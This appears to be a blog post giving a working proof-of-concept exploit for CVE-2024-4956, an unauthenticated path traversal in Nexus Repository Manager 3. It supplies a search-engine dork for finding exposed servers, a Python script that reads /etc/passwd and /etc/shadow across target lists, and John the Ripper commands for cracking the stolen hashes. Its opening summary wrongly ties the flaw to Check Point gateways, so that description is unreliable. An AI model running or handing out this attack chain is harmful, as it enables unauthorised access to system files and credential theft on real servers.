POC — CVE-2024–4956 -Unauthenticated Path Traversal
POC — CVE-2024–4956 — Nexus Repository Manager 3 Unauthenticated Path Traversal
Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with Remote Access VPN or Mobile Access Software Blades. A security fix that mitigates this vulnerability is available.
Read about it — CVE-2024–4956
Disclaimer: This Proof of Concept (POC) is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
Finding Targets
To find potential targets, use Fofa (similar to Shodan.io):
- Fofa Dork:
header="Server: Nexus/3.53.0-01 (OSS)"
First, clone the repository:
git clone https://github.com/verylazytech/CVE-2024-4956Or copy code manually:
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ _ _ ___ ____ __
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || | / _ \| ___| / /_
| | \ \ / /| _| __) | | | |__) | || |_ | || || (_) |___ \| '_ \
| |___ \ V / | |___ / __/| |_| / __/|__ _| |__ _\__, |___) | (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_| /_/|____/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
return banner
def read_ip_port_list(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
return [line.strip() for line in lines]
def make_request(ip_port, url_path):
url = f"http://{ip_port}/{url_path}"
try:
response = requests.get(url, timeout=5)
return response.text
except requests.RequestException as e:
return None
def main(ip_port_list):
for ip_port in ip_port_list:
for url_path in ["%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd", "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow"]:
response_text = make_request(ip_port, url_path)
if response_text and "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false" not in response_text and "Not Found" not in response_text and "400 Bad Request" not in response_text and "root" in response_text:
print(f"Address: {ip_port}")
print(f"File Contents for passwd:\n{response_text}" if "passwd" in url_path else f"File Contents for shadow:\n{response_text}")
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956", usage=argparse.SUPPRESS)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n")
group.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n")
args = parser.parse_args()
if args.list:
ip_port_list = read_ip_port_list(args.list)
print(banner())
main(ip_port_list)
elif args.url:
ip_port_list = [args.url]
print(banner())
main(ip_port_list)
else:
print(banner())
parser.print_help()Next chose your target and add it to list.txt file in this format:
Run the Exploit:
python3 CVE-2024-4956.py -l list.txtThe output is passwd and shadow files that found:
Now after you find both file passwd & shadow you can try crack the hash with JohnTheRipper, after running the exploit you have 2 files, passwd & shadow, so you can merge them into one file and try crack them (I used rockyou.txt but it can be any password wordlist):
unshadow passwd shadow > unshadowed.txtjohn --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt📎 If You like my content and you want some more, View On My Shop bundle of 20+ E-Books for your OSCP!
